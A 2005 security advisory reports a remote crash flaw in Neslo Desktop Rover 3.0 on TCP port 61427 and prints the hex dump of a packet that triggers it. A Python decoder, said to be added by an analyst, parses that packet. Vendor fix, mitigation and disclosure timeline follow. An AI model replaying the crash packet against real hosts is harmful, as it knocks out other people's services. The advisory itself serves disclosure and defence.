[NEWS] Neslo Desktop Rover Remote DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 04/21/05
To: list@securiteam.com Date: 21 Apr 2005 16:12:23 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Neslo Desktop Rover Remote DoS
------------------------------------------------------------------------
SUMMARY
Desktop Rover <http://www.nelsosoftware.com> is "a software application
for Microsoft Windows that provides the features of a hardware KVM
(Keyboard, Video, Mouse)". Desktop Rover is vulnerable to a denial of
service (DoS). A remote attacker could send a specially crafted packet to
trigger an invalid memory access to crash the application, resulting in a
denial of service.
DETAILS
Vulnerable Systems:
* Neslo Desktop Rover version 3.0
Immune Systems:
* Neslo Desktop Rover version 3.1
By default, Desktop Rover listens on port 61427/TCP; it also conveniently
opens this port in the Windows XP personal firewall. The following is an
example packet that will cause a denial of service. There are more
variations, but this one will suffice as an example.
20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum
ok] 1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)
4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000
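For analysts reading the capture above, the following added example (not part of the original advisory) decodes the hex dump's IPv4 and TCP headers, checks the IP header checksum, and reports where the application data begins, so the fields can be compared against the tcpdump summary line. The names decode_capture and ip_checksum_ok are illustrative.

```python
import ipaddress
import struct

# Hex dump copied verbatim from the advisory's tcpdump output (starts at the IP header).
CAPTURE_HEX = """
4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000
"""

TCP_FLAGS = ((0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
             (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG"))

def ip_checksum_ok(header: bytes) -> bool:
    """A valid IPv4 header sums to 0xFFFF in 16-bit one's-complement arithmetic."""
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF

def decode_capture(hex_dump: str) -> dict:
    """Parse an IPv4/TCP packet from a hex dump and locate the application payload."""
    raw = bytes.fromhex("".join(hex_dump.split()))
    if len(raw) < 20 or raw[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (raw[0] & 0x0F) * 4                      # IP header length in bytes
    total_len, ident = struct.unpack("!HH", raw[2:6])
    if ihl < 20 or raw[9] != 6 or not ihl + 20 <= total_len <= len(raw):
        raise ValueError("truncated packet or not TCP")
    sport, dport, _seq, _ack, off_flags, window = struct.unpack(
        "!HHIIHH", raw[ihl:ihl + 16])
    tcp_len = (off_flags >> 12) * 4                # TCP header length, options included
    if tcp_len < 20 or ihl + tcp_len > total_len:
        raise ValueError("bad TCP data offset")
    return {
        "src": str(ipaddress.IPv4Address(raw[12:16])), "sport": sport,
        "dst": str(ipaddress.IPv4Address(raw[16:20])), "dport": dport,
        "id": ident, "ttl": raw[8], "window": window,
        "flags": [name for bit, name in TCP_FLAGS if off_flags & bit],
        "ip_checksum_ok": ip_checksum_ok(raw[:ihl]),
        "payload_offset": ihl + tcp_len,           # first byte of application data
        "payload_len": total_len - ihl - tcp_len,
    }

if __name__ == "__main__":
    for field, value in decode_capture(CAPTURE_HEX).items():
        print(f"{field:15} {value}")
```

The decoded payload length matches the "1:13(12)" sequence range in the summary line: the last 12 bytes of the dump are the application data sent to port 61427.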
Solution:
The vendor is releasing a fix in version 3.1 soon which will address the
vulnerability. Until then, restricting access to the Desktop Rover ports
will reduce the risk of this vulnerability being exploited.
Disclosure Timeline:
4.14.2005 - Initial vendor contact by e-mail
4.15.2005 - Initial vendor response. Vendor addressed vulnerability. Fix
confirmed by EvilPacket Security Research
4.19.2005 - Advisory released
ADDITIONAL INFORMATION
The information has been provided by Adam Baldwin <evilpacket@gmail.com>.
The original article can be found at:
http://www.evilpacket.net/advisories/EP-000-0003.html
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.